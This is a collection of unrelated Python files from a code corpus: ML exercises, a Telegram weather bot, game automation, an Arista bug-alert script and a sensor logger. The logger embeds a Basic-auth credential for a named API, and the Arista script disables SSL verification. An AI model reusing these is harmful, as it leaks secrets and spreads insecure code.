self.rings:\n for node in nodes:\n node.update(self.rings)\n\n for nodes in self.rings:\n for node in nodes:\n node.pos = node.pos_next","sub_path":"dan/project/slicestack/differential_line.py","file_name":"differential_line.py","file_ext":"py","file_size_in_byte":5066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"582989878","text":"# epochs 100\n# validation_split, callback\n# early_stopping 5\n# Reduce LR 3\n# modelcheckpoint 
hdf5 save\n\nimport numpy as np\nfrom tensorflow.keras.models import Sequential, Model\nfrom tensorflow.keras.layers import Dense, Dropout, Input, Conv2D\nfrom tensorflow.keras.datasets import mnist\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n# 1\nfrom tensorflow.keras.utils import to_categorical\ny_train = to_categorical(y_train)\ny_test = to_categorical(y_test)\n\nx_train = x_train.reshape(60000, 28*28).astype('float32')/255.\nx_test = x_test.reshape(10000, 28*28).astype('float32')/255.\n\n# 2\ndef build_model(drop = 0.5, optimizer = 'adam'):\n    inputs = Input(shape=(28*28,), name='input')\n    x = Dense(512, activation='relu', name='hidden1')(inputs)\n    x = Dropout(drop)(x)\n    x = Dense(256, activation='relu', name='hidden2')(x)\n    x = Dropout(drop)(x)\n    x = Dense(128, activation='relu', name='hidden3')(x)\n    x = Dropout(drop)(x)\n    outputs = Dense(10, activation='softmax', name='output')(x)\n    model = Model(inputs=inputs, outputs=outputs)\n    model.compile(optimizer=optimizer, metrics=['acc'], loss='categorical_crossentropy')\n\n    return model\n\ndef create_hyperparameters():\n    batches = [10, 20, 30, 40, 50]\n    optimizers = ['rmsprop', 'adam', 'adadelta']\n    dropout = [0.1, 0.2, 0.3]\n    return {\"batch_size\":batches, \"optimizer\":optimizers, \"drop\":dropout}\nhyperparameters = create_hyperparameters()\n# model2 = build_model()\n\nfrom tensorflow.keras.wrappers.scikit_learn import KerasClassifier\nmodel2 = KerasClassifier(build_fn=build_model, verbose=1)\n\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\nsearch = RandomizedSearchCV(model2, hyperparameters, cv = 3)\n# search = GridSearchCV(model2, hyperparameters, cv = 3)\n\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\nmodelpath = '../data/modelcheckpoint/k61_mnist_{epoch:02d}-{val_loss:.4f}.hdf5'\ncp = ModelCheckpoint(filepath=modelpath, monitor='val_loss', save_best_only=True, mode='auto')\nes = EarlyStopping(monitor='val_loss', patience=5)\nreduce_lr = ReduceLROnPlateau(monitor='val_loss', patience=3, factor=0.5, verbose=1)\n\nsearch.fit(x_train, y_train, verbose=1, epochs=100, validation_split=0.2, callbacks=[es, reduce_lr, cp])\nprint(search.best_params_) # the best combination among the parameters I selected\nprint(search.best_estimator_) # the best estimator among all the parameters\nprint(search.best_score_)\nacc = search.score(x_test, y_test)\nprint(\"final score : \", acc)\n\n# {'optimizer': 'rmsprop', 'drop': 0.1, 'batch_size': 40}\n# \n# 0.958816667397817\n# 250/250 [==============================] - 0s 910us/step - loss: 0.1148 - acc: 0.9696\n# final score :  0.9696000218391418","sub_path":"keras2/keras61_4_epochs.py","file_name":"keras61_4_epochs.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"39446111","text":"import pandas\nimport math\nimport numpy\nfrom sklearn.metrics import roc_auc_score\n\ndef main():\n\tdata = pandas.read_csv('./data/logistic-regression.csv', header=None)\n\tx = data.ix[:, 1:].as_matrix()\n\ty = data.ix[:, 0]\n\t\n\tweights_without_reg = gradient(x, y)\n\tweights_with_reg = gradient(x, y, 10)\n\n\t# print(weights_without_reg)\n\t# print(weights_with_reg)\n\n\tpredictions_without_reg = [x[:,0][i] * weights_without_reg[0] + x[:,1][i] * weights_without_reg[1] for i, v in enumerate(y) ]\n\tpredictions_with_reg = [x[:,0][i] * weights_with_reg[0] + x[:,1][i] * weights_with_reg[1] for i, v in enumerate(y) ]\n\n\tscore_without_reg = roc_auc_score(y, 
predictions_without_reg)\n\tscore_with_reg = roc_auc_score(y, predictions_with_reg)\n\n\tanswer = str(numpy.round(score_without_reg, 3)) + \" \" + str(numpy.round(score_with_reg, 3))\n\n\tsubmission_file = open('submissions/logistic-regression/scores.txt', 'w+')\n\tsubmission_file.write(answer)\n\tsubmission_file.close()\n\n\tprint(answer)\n\n\n\ndef gradient(x, y, regularization_coef = 0):\n\tlearning_rate = 0.1\n\tconvergence_criteria = 1e-5\n\tmax_iterations_left = 10**5\n\tcurrent_distance = float(\"inf\")\n\tw_1 = 0\n\tw_2 = 0\n\tl = len(y)\n\n\twhile current_distance > convergence_criteria and max_iterations_left > 0:\n\t\ttmp_w_1, tmp_w_2 = w_1, w_2\n\n\t\tw_1 = w_1 + (learning_rate/l) * sum( [y[i] * x[:,0][i] * (1 - 1/( 1 + math.exp( -y[i] * ( tmp_w_1 * x[:,0][i] + tmp_w_2 * x[:,1][i]) ) ) ) for i, v in enumerate(y)] ) - learning_rate * regularization_coef * w_1\n\t\tw_2 = w_2 + (learning_rate/l) * sum( [y[i] * x[:,1][i] * (1 - 1/( 1 + math.exp( -y[i] * ( tmp_w_1 * x[:,0][i] + tmp_w_2 * x[:,1][i]) ) ) ) for i, v in enumerate(y)] ) - learning_rate * regularization_coef * w_2\n\n\t\tmax_iterations_left -= 1\n\t\tcurrent_distance = math.sqrt( (w_1 - tmp_w_1)**2 + (w_2 - tmp_w_2)**2 )\n\t\t# print(current_distance)\n\n\treturn (w_1, w_2)\n\nif __name__ == '__main__':\n\tmain()","sub_path":"tasks/logistic-regression/logistic-regression.py","file_name":"logistic-regression.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"41705547","text":" # * Copyright (C) 2017 Arista Networks, Inc.\n # * Use of this source code is governed by the Apache License 2.0\n # * that can be found in the COPYING file.\n\nfrom jsonrpclib import Server\nimport ssl\nimport json\nhost = '10.85.128.153'\nuser = 'admin'\npasswd = ''\n\nurl = \"https://{}:{}@{}/command-api\".format(user,passwd,host)\nssl._create_default_https_context = ssl._create_unverified_context\ncvxreq = Server(url)\n\ndef sw_mac():\n resp = cvxreq.runCmds(1,[\"show cvx connections brief\"])\n n = 0\n macs = []\n for x in resp[0][\"connections\"]:\n \tsw_mac = resp[0][\"connections\"][n][\"switchId\"]\n \tmacs.append(sw_mac)\n \tn += 1\n return macs\n\ndef client_host_names():\n resp = cvxreq.runCmds(1,[\"show cvx connections brief\"])[0]['connections']\n hostnames = []\n for rows in resp:\n for key, value in rows.items():\n if key == 'hostname':\n hostnames.append(value)\n return hostnames\n\ndef bugalerts(mac):\n op = {}\n resp = cvxreq.runCmds(1,[\"show service bug-alert report switch mac %s\" %mac])\n eos = resp[0][\"switches\"][mac][\"eosVersion\"].replace(\"'\",\"\")\n hostname = resp[0][\"switches\"][mac][\"hostname\"]\n bugs = resp[0][\"switches\"][mac][\"bugExposureList\"]\n buglist = []\n for bug in bugs:\n bug_det = resp[0][\"bugs\"][str(bug)][\"bugSummary\"]\n ver_intro = resp[0][\"bugs\"][str(bug)][\"versionsIntroduced\"]\n ver_fix = resp[0][\"bugs\"][str(bug)][\"versionsFixed\"]\n buglist.append({'bugid':bug,'details':bug_det,'ver_intro':ver_intro,'ver_fix':ver_fix})\n op['mac'] = mac\n op['host'] = hostname\n op['eos'] = eos\n op['bugdata'] = buglist\n # op.append({'mac':mac,'host':hostname,'eos':eos,'bugdata':buglist})\n return op\n\ndef get_all_bugs():\n resp = cvxreq.runCmds(1,[\"show service bug-alert detail bugs\"])\n hostnames = client_host_names()\n buglist = []\n for bugid,bugdata in resp[0]['bugs'].iteritems():\n buglist.append(bugid)\n return buglist\n\ndef main():\n macs = sw_mac()\n result = []\n for mac in macs:\n mac = 
mac.replace(':','-')\n op = bugalerts(mac)\n result.append(op)\n return result\n","sub_path":"bugalerts.py","file_name":"bugalerts.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"593872951","text":"from bot import bot\nimport config\nimport data_b\nimport get_weather\nimport buttons\n\n\n@bot.message_handler(commands=['start'])\ndef start(message):\n sti = open('static/AnimatedSticker.tgs', 'rb')\n bot.send_sticker(message.chat.id, sti)\n bot.send_message(message.chat.id, 'Hello! What city do you live in ?')\n\n\n@bot.message_handler(commands=['help'])\ndef helper(message):\n bot.send_message(message.chat.id,\n '''Commands:\\nget - for get info about user.\\nadd (your city) - add\\\n or create new user.\\ndel (your city) - delete user.\\nupdate (your city) - update user.''')\n\n\n@bot.message_handler(commands=['get'])\ndef get(message):\n bot.send_message(message.chat.id, data_b.get_user(message.chat.id))\n\n\n@bot.message_handler(commands=['add'])\ndef add(message):\n if data_b.add_user(message.chat.id, message.text[5:]):\n bot.send_message(message.chat.id, 'Added.', reply_markup=buttons.city_button(message.text[5:]))\n\n\n@bot.message_handler(commands=['update'])\ndef update(message):\n if data_b.update_user(message.chat.id, message.text[8:]):\n bot.send_message(message.chat.id, 'Updated.',\n reply_markup=buttons.city_button(message.text[8:]))\n\n\n@bot.message_handler(commands=['del'])\ndef delete(message):\n if data_b.del_user(message.chat.id, message.text[5:]):\n bot.send_message(message.chat.id, 'Deleted.')\n\n\n@bot.message_handler(content_types=['text'])\ndef change(message):\n bot.send_message(message.chat.id, get_weather.get_weather_info(message.text))\n\n\nif __name__ == '__main__':\n bot.polling(none_stop=True)\n","sub_path":"weather_handler.py","file_name":"weather_handler.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"191088694","text":"from functools import*;\r\n\r\ndef implist():\r\n\t\r\n\tarr1 =list();\r\n\r\n\tno1 = int(input(\"Enter number of elements wnt put into list \"));\r\n\r\n\tprint(\"Enter element in list \");\r\n\r\n\tfor i in range(no1):\r\n\r\n\t\tno2 = int(input(\"Number: \"));\r\n\r\n\t\tarr1.append(no2);\r\n\r\n\treturn(arr1);\r\n\r\n\r\ndef fun(no):\r\n\t\r\n\ta = 0;\r\n\tfor i in range(no):\r\n\t\tif(no % (i+1) == 0):\r\n\t\t\ta = a+1;\r\n\tif a <= 2:\r\n\t\treturn(no);\r\n\t\r\n\r\ndef gun(no):\r\n\r\n\treturn(no * 2);\r\n\r\ndef man(no1,no2):\r\n\tmax = no1;\r\n\r\n\tif (no1 < no2):\r\n\t\tmax = no2;\r\n\treturn(max);\r\n\r\ndef main():\r\n\t\r\n\tarr = list(implist());\r\n\t\r\n\tprint(\"Entered list is \",arr); \r\n\r\n\tlist1 = list(filter(fun,arr));\r\n\r\n\tprint(\"prime numbers are\",list1);\r\n\r\n\tlist2 = list(map(gun,list1));\r\n\r\n\tprint(\"Squre of all numbers\",list2);\r\n\r\n\tproduct = reduce(man,list2);\r\n\r\n\tprint(\"Addition of all elements\",product);\r\n\r\n\r\n\r\n\r\nif(__name__ ==\"__main__\"):\r\n\r\n\tmain();\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Assignment 4/Filter_map_reduce_3.py","file_name":"Filter_map_reduce_3.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"552975236","text":"import random\n\nheads = 0\ntails = 0\nsides = 0\n\nfor i in range(0,100):\n flip = random.randint(0, 2)\n\n if flip == 0:\n heads += 1\n elif flip 
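In the Filter_map_reduce_3.py record just above, `fun` counts every divisor and so accepts 1 as prime, `gun` doubles each value while the script prints "Squre of all numbers", and `reduce(man, ...)` computes a maximum while the script prints "Addition of all elements". A self-consistent sketch of the same filter/map/reduce pipeline follows; the sample list is illustrative.

from functools import reduce

def is_prime(n):
    # n < 2 rules out 0 and 1; trial division up to sqrt(n) is enough.
    if n < 2:
        return False
    return all(n % d for d in range(2, int(n ** 0.5) + 1))

values = [1, 2, 3, 4, 7, 10]
primes = list(filter(is_prime, values))        # [2, 3, 7]
doubled = list(map(lambda n: n * 2, primes))   # [4, 6, 14] -- doubled, not squared
largest = reduce(max, doubled)                 # 14 -- pairwise max, not a sum
print(primes, doubled, largest)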
== 1:\n tails += 1\n else:\n sides += 1\n\nprint(\"Heads count %i\" % heads)\nprint(\"Tails count %i\" % tails)\nprint(\"Sides count %i\" % sides)","sub_path":"coin counter game/CoinCounter.py","file_name":"CoinCounter.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"387294717","text":"from capitals import capitals_dict\nimport random\n\ndone = True\nstates = []\n\nwhile done is True:\n for k in capitals_dict:\n states.append(k)\n\n s = random.choice(states)\n c = capitals_dict[s]\n\n answer = input('What is the capital of {}? '.format(s))\n if answer.lower() == c.lower():\n print('Correct')\n done = False\n elif answer.lower() is not c.lower():\n end = input('Incorrect answer. Press enter to try another state. Type exit to end the game. ')\n if end.lower() == 'exit':\n print('The correct answer was {}. Goodbye.'.format(c))\n done = False\n","sub_path":"RealPythonPart1-v2.2.0/capital_city_loop.py","file_name":"capital_city_loop.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"164986716","text":"from modules.util import (to_float, DictColl)\nimport re\nclass Upgrade(object):\n def __init__(self, val=0, name=\"\", avail=False, base_importance = 0, trimps=None):\n self.val = to_float(val)\n self.avail = avail\n self.base_importance = base_importance\n self.importance = base_importance\n self.trimps = trimps\n self.driver = trimps.driver\n self.name = name\n\n def purchase(self):\n elem = self.get_element()\n elem.click()\n \n if self.name == \"Bloodlust\":\n self.trimps.actions[\"Fight\"].make_irrelevant()\n\n def get_element(self):\n return self.driver.find_element_by_id(self.name)\n\n def refresh(self):\n try:\n elem = self.get_element()\n self.val = to_float(re.findall(\"\\s(\\S*)\", elem.text)[0])\n self.avail = \"CanAfford\" in elem.get_attribute(\"class\")\n except:\n pass\n\nclass Upgrades(DictColl):\n\n def __init__(self, trimps):\n self.driver = trimps.driver\n self.trimps = trimps\n self.store = {\n \"Coordination\": Upgrade(name=\"Coordination\", trimps = trimps),\n \"Gigastation\": Upgrade(name=\"Gigastation\", trimps = trimps),\n \"Supershield\": Upgrade(name=\"Supershield\", trimps = trimps),\n \"Dagadder\": Upgrade(name=\"Dagadder\", trimps = trimps),\n\n \"Bootboost\": Upgrade(name=\"Bootboost\", trimps = trimps),\n \"Megamace\": Upgrade(name=\"Megamace\", trimps = trimps),\n \"Hellishmet\": Upgrade(name=\"Hellishmet\", trimps = trimps),\n \"Polierarm\": Upgrade(name=\"Polierarm\", trimps = trimps),\n\n \"Pantastic\": Upgrade(name=\"Pantastic\", trimps = trimps),\n \"Axeidic\": Upgrade(name=\"Axeidic\", trimps = trimps),\n \"Smoldershoulder\": Upgrade(name=\"Smoldershoulder\", trimps = trimps),\n \"Greatersword\": Upgrade(name=\"Greatersword\", trimps = trimps),\n \"Bestplate\": Upgrade(name=\"Bestplate\", trimps = trimps),\n \n \"Coordination\": Upgrade(name=\"Coordination\", base_importance=50, trimps = trimps),\n \"Battle\": Upgrade(name=\"Battle\", base_importance=100, trimps = trimps),\n \"Scientists\": Upgrade(name=\"Scientists\", base_importance=100, trimps = trimps),\n \"Efficiency\": Upgrade(name=\"Efficiency\", base_importance=100, trimps = trimps),\n \"Speedminer\": Upgrade(name=\"Speedminer\", base_importance=100, trimps = trimps),\n \"Speedlumber\": Upgrade(name=\"Speedlumber\", base_importance=100, trimps = trimps),\n \"Speedfarming\": Upgrade(name=\"Speedfarming\", 
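random.randint(0, 2) in the coin-counter record is inclusive on both ends, so "sides" comes up about a third of the time, as often as heads or tails. If a rare edge landing was the intent, weighted sampling states it explicitly; the 49.5/49.5/1 split below is an assumed illustration, not from the original. (The capitals-quiz record in the same batch has a related slip: it re-appends every state name to `states` on each pass of the while loop, so building that list once before the loop would be cleaner.)

import random

counts = {"heads": 0, "tails": 0, "side": 0}
for _ in range(100):
    # random.choices draws one outcome per call, honouring the weights.
    outcome = random.choices(["heads", "tails", "side"],
                             weights=[49.5, 49.5, 1.0])[0]
    counts[outcome] += 1
print(counts)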
base_importance=100, trimps = trimps),\n \"Speedscience\": Upgrade(name=\"Speedscience\", base_importance=100, trimps = trimps),\n \n \"Bloodlust\": Upgrade(name=\"Bloodlust\", base_importance=50, trimps = trimps),\n \"TrainTacular\": Upgrade(name=\"TrainTacular\", base_importance=50, trimps = trimps),\n \"Miners\": Upgrade(name=\"Miners\", base_importance=150, trimps = trimps),\n }\n\n \n def refresh(self):\n for _, build in self.items():\n build.refresh()","sub_path":"main/modules/upgrades.py","file_name":"upgrades.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"480969217","text":"# Code adapted from https://www.dataquest.io/mission/74/getting-started-with-kaggle/\n# Predicts survival by logistic regression model or random forest model\n\n# Import pandas & numpy & regular expression\nimport pandas as pd\nimport numpy as np\nimport re\n# Sklearn has a helper that makes it easy to do cross validation\nfrom sklearn.cross_validation import cross_val_score\n# Import the logistic regression class\nfrom sklearn.linear_model import LogisticRegression\n# Import the random forest model class\nfrom sklearn.ensemble import RandomForestClassifier\n\n\n### Import data sets ###\ntitanic = pd.read_csv('train.csv', header=0)\ntitanic_test = pd.read_csv('test.csv', header=0)\n\n\n### Data munging! ###\n# Turn females to 0 and males to 1\ntitanic.Sex = titanic.Sex.map({'female':0, 'male':1}).astype(int)\ntitanic_test.Sex = titanic_test.Sex.map({'female':0, 'male':1}).astype(int)\n\n# Set all missing age to median age\n# titanic.Age = titanic.Age.fillna(titanic.Age.median())\n# titanic_test.Age = titanic_test.Age.fillna(titanic.Age.median())\n\n# Fill in missing age to median age by classifying with Pclass & SibSp\nfor i in range(len(titanic.Age)):\n if np.isnan(titanic.Age[i]):\n if titanic.SibSp[i] == 0:\n titanic.loc[i,\"Age\"] = np.nanmedian(titanic.Age[(titanic.Pclass==titanic.Pclass[i]) & (titanic.SibSp == 0)])\n elif titanic.SibSp[i] > 0:\n titanic.loc[i,\"Age\"] = np.nanmedian(titanic.Age[(titanic.Pclass==titanic.Pclass[i]) & (titanic.SibSp > 0)])\n else:\n titanic.loc[i,\"Age\"] = np.nanmedian(titanic.Age[titanic.Pclass==titanic.Pclass[i]])\nfor i in range(len(titanic_test.Age)):\n if np.isnan(titanic_test.Age[i]):\n if titanic_test.SibSp[i] == 0:\n titanic_test.loc[i,\"Age\"] = np.nanmedian(titanic.Age[(titanic.Pclass == titanic_test.Pclass[i]) & (titanic.SibSp == 0)])\n elif titanic_test.SibSp[i] > 0:\n titanic_test.loc[i,\"Age\"] = np.nanmedian(titanic.Age[(titanic.Pclass == titanic_test.Pclass[i]) & (titanic.SibSp > 0)])\n else:\n titanic_test.loc[i,\"Age\"] = np.nanmedian(titanic.Age[titanic.Pclass == titanic_test.Pclass[i]])\n\n# Set all missing fare to median fare by classifying with Pclass\nfor i in range(len(titanic_test.Fare)):\n if np.isnan(titanic_test.Fare[i]):\n titanic_test.loc[i,\"Fare\"] = np.median(titanic.Fare[titanic.Pclass == titanic_test.Pclass[i]])\n\n# Create new column---Titles\n# A function to get the title from a name.\ndef get_title(name):\n # Use a regular expression to search for a title.\n # Titles always consist of capital and lowercase letters, and end with a period.\n title_search = re.search(' ([A-Za-z]+)\\.', name)\n # If the title exists, extract and return it.\n if title_search:\n return title_search.group(1)\n return \"\"\n# Map each title to an integer. 
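The Upgrades.store literal in the record above lists the key "Coordination" twice. Python dict literals do not raise on duplicates; the last binding wins, so the first entry (default importance) is silently discarded. A minimal demonstration of the pitfall:

store = {
    "Coordination": {"base_importance": 0},
    "Coordination": {"base_importance": 50},
}
print(store)   # {'Coordination': {'base_importance': 50}} -- only one key survives
# If both entries were intended, the second needs a distinct key; linters
# such as pyflakes flag repeated dictionary keys for exactly this reason.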
Some titles are very rare, and are compressed into the same codes as other titles.\ntitle_mapping = {\"Mr\": 1, \"Miss\": 2, \"Mrs\": 3, \"Master\": 4, \"Dr\": 5, \"Rev\": 6, \"Major\": 7, \"Col\": 7, \"Mlle\": 8,\n \"Mme\": 8, \"Don\": 9, \"Dona\": 9, \"Lady\": 10, \"Countess\": 10, \"Jonkheer\": 10, \"Sir\": 9, \"Capt\": 7, \"Ms\": 2}\n# Titles for training set\ntitles = titanic[\"Name\"].apply(get_title)\nfor k,v in title_mapping.items():\n titles[titles == k] = v\ntitanic[\"Titles\"] = titles\n# Titles for test set\ntitles_test = titanic_test[\"Name\"].apply(get_title)\nfor k,v in title_mapping.items():\n titles_test[titles_test == k] = v\ntitanic_test[\"Titles\"] = titles_test\n\n# Create new column---FamilySize\ntitanic[\"FamilySize\"] = titanic[\"SibSp\"] + titanic[\"Parch\"]\ntitanic_test[\"FamilySize\"] = titanic_test[\"SibSp\"] + titanic_test[\"Parch\"]\n\n\n# The columns we'll use to predict the target\n# Available columns (*custom): Pclass, Name, Sex, Age, SibSp, Parch, Ticket, Fare, Cabin, Embarked, Titles*, FamilySize*\npredictors = [\"Pclass\", \"Sex\", \"Fare\", \"Titles\", \"Age\"]\n\n\n# Initialize our algorithm class - CHOOSE ONE\n# alg = LogisticRegression(random_state=1)\nalg = RandomForestClassifier(random_state=1, n_estimators=150, min_samples_split=4, min_samples_leaf=2)\n\n# Generate cross validation folds for the titanic dataset. It return the row indices corresponding to train and test.\n# We set random_state to ensure we get the same splits every time we run this.\nscore = cross_val_score(alg, titanic[predictors], titanic[\"Survived\"], cv=3).mean()\n\n# Train the algorithm using all the training data\nalg.fit(titanic[predictors], titanic[\"Survived\"])\n\n# Make predictions using the test set.\npredictions = alg.predict(titanic_test[predictors])\n\n# Write prediction file to prediction.csv\nsubmission = pd.DataFrame({\n \"PassengerId\": titanic_test[\"PassengerId\"],\n \"Survived\": predictions\n })\nsubmission.to_csv(\"prediction.csv\", index=False)\n\nprint(score)","sub_path":"KaggleTitanic.py","file_name":"KaggleTitanic.py","file_ext":"py","file_size_in_byte":4771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"144904123","text":"import task32\nimport task33\nimport task34\nimport task35\nimport numpy as np\n\nclass NeuralNetwork:\n def __init__(self,bias,standard_deviation,in_size,hide_size,out_size):\n self.params = {}\n self.grads = {}\n self.params['W1'] = standard_deviation * np.random.randn(in_size,hide_size)\n self.params['b1'] = np.zeros(hide_size)\n self.params['W2'] = standard_deviation * np.random.randn(hide_size,out_size)\n self.params['b2'] = np.zeros(out_size)\n self.grads['W2'] = None\n self.grads['b2'] = None\n self.grads['W1'] = None\n self.grads['b1'] = None\n self.acc = 0\n self.nums = 0\n self.losscost = 0\n self.Sigmoid = task33.Sigmoid()\n #self.Sigmoid2 = task33.Sigmoid()\n self.ReLU = task32.ReLU()\n self.Affine = task34.Affine()\n self.Affine2 = task34.Affine()\n self.SoftmaxCrossEntropy = task35.SoftmaxCrossEntropy()\n\n def softmax(self,x):\n return np.exp(x) / np.sum(np.exp(x), axis = 0, keepdims = True) \n\n def forward(self, x):\n W1, W2 = self.params['W1'],self.params['W2']\n b1, b2 = self.params['b1'],self.params['b2']\n a1 = self.Affine.forward(x,W1,b1)\n z1 = self.ReLU.forward(a1)\n a2 = self.Affine2.forward(z1,W2,b2)\n #z2 = self.Sigmoid2.forward(a2)\n return a2\n\n def loss(self, x, t):\n y = self.forward(x)\n ans = np.copy(y)\n for i in range(len(y)):\n 
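The Titanic record imports cross_val_score from sklearn.cross_validation, a module deprecated in scikit-learn 0.18 and removed in 0.20; the same function now lives in sklearn.model_selection. A sketch of the updated import, with a small synthetic frame standing in for the real data (the values are illustrative):

import pandas as pd
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import cross_val_score  # modern location

df = pd.DataFrame({
    "Pclass":   [1, 3, 2, 3, 1, 2, 3, 1],
    "Sex":      [0, 1, 0, 1, 1, 0, 1, 0],
    "Fare":     [80.0, 7.9, 26.0, 8.1, 52.0, 13.0, 7.2, 71.3],
    "Survived": [1, 0, 1, 0, 0, 1, 0, 1],
})
alg = RandomForestClassifier(random_state=1, n_estimators=150,
                             min_samples_split=4, min_samples_leaf=2)
score = cross_val_score(alg, df[["Pclass", "Sex", "Fare"]],
                        df["Survived"], cv=2).mean()
print(score)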
#print(self.softmax(ans[i]))\n ansnum = np.argmax(self.softmax(ans[i]))\n #print(ansnum)\n ans[i] = np.identity(10, dtype = \"int8\")[ansnum]\n self.nums += 1\n if(np.allclose(ans[i], t[i])):\n self.acc += 1\n self.losscost = self.SoftmaxCrossEntropy.forward(y,t)\n\n def backprop(self, x, t):\n self.loss(x,t)\n dx1 = self.SoftmaxCrossEntropy.backprop()\n #dx2 = self.Sigmoid2.backprop(dx1)\n dx3 = self.Affine2.backprop(dx1)[0]\n self.grads['W2'] = self.Affine2.backprop(dx1)[1]\n self.grads['b2'] = self.Affine2.backprop(dx1)[2]\n dx4 = self.ReLU.backprop(dx3)\n dx5 = self.Affine.backprop(dx4)[0]\n self.grads['W1'] = self.Affine.backprop(dx4)[1]\n self.grads['b1'] = self.Affine.backprop(dx4)[2]\n\n def sgd(self, x, t, learning_rate):\n self.backprop(x,t)\n for key in self.params.keys():\n self.params[key] -= learning_rate * self.grads[key]\n \n\n","sub_path":"day2/task41.py","file_name":"task41.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"432109666","text":"import time\nimport datetime\n\ndef lireFichier (emplacement) :\n fichTemp = open(emplacement)\n contenu = fichTemp.read()\n fichTemp.close()\n return contenu\n\ndef recupTemp (contenuFich) :\n secondeLigne = contenuFich.split(\"\\n\")[1]\n temperatureData = secondeLigne.split(\" \")[9]\n temperature = float(temperatureData[2:])\n temperature = temperature / 1000\n return temperature\n\ndef sauvegarde (temperature_blue, temperature_green, temperature_yellow, date, emplacement) :\n fichierSauvegarde = open(emplacement, \"a\")\n fichierSauvegarde.write(str(date)+\";\")\n fichierSauvegarde.write(str(temperature_blue)+\";\")\n fichierSauvegarde.write(str(temperature_green)+\";\")\n fichierSauvegarde.write(str(temperature_yellow)+\";\")\n temperature_average = (temperature_blue + temperature_green + temperature_yellow) / 3\n fichierSauvegarde.write(str(temperature_average)+'\\r\\n')\n fichierSauvegarde.close()\n\n# fonction pour renseigner les infos dans l'API request\ndef upload_data_api(TEMPERATURE_GREEN, HUMIDITY, TEMP_BLUE):\n API_ENDPOINT = \"https://api.sensorsfolie.xyz/api/sensors\"\n # data to be sent to api\n data = {\n \"humidity_flat\": HUMIDITY,\n \"temp_flat\": TEMPERATURE_GREEN,\n \"temp_paris\": TEMP_BLUE,\n \"id_sensors\": \"ClunyStreet_hackedfridge\"\n }\n\n # headers to be sent to api\n headers = {'Authorization' : 'Basic YWRtaW46VDZoZ0Y4ISVTRA==', 'Accept' : 'application/json', 'Content-Type' : 'application/json'}\n\n # sending post request and saving response as response object\n r = requests.post(url = API_ENDPOINT, data = json.dumps(data), headers = headers)\n\n # extracting response text\n pastebin_url = r.text\n print(\"The pastebin URL is:%s\"%pastebin_url)\n\nwhile True :\n date = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n contenuFich_blue = lireFichier(\"/sys/bus/w1/devices/28-fdda8f1d64ff/w1_slave\")\n temperature_blue = recupTemp(contenuFich_blue)\n contenuFich_green = lireFichier(\"/sys/bus/w1/devices/28-f5d58f1d64ff/w1_slave\")\n temperature_green = recupTemp(contenuFich_green)\n contenuFich_yellow = lireFichier(\"/sys/bus/w1/devices/28-97d68f1d64ff/w1_slave\")\n temperature_yellow = recupTemp(contenuFich_yellow)\n sauvegarde(temperature_blue, temperature_green, temperature_yellow, date, \"TemperatureTexte.csv\")\n humidity = 0\n upload_data_api(temperature_green, humidity, temperature_blue)\n\n\n 
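The softmax in task41.py computes exp(x)/sum(exp(x)) directly, which overflows once logits get large. The standard fix, shifting by the maximum before exponentiating, leaves the result mathematically unchanged (axis=-1 here so batches of rows also work; the record applies it one row at a time with axis=0):

import numpy as np

def softmax_stable(x):
    # exp(x - max(x)) normalizes to the same output as exp(x), because the
    # common factor exp(-max(x)) cancels, but it can no longer overflow.
    shifted = x - np.max(x, axis=-1, keepdims=True)
    e = np.exp(shifted)
    return e / e.sum(axis=-1, keepdims=True)

logits = np.array([1000.0, 1001.0, 1002.0])
print(softmax_stable(logits))   # ~[0.090, 0.245, 0.665]
# The naive version would compute np.exp(1000) -> inf and return nans.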
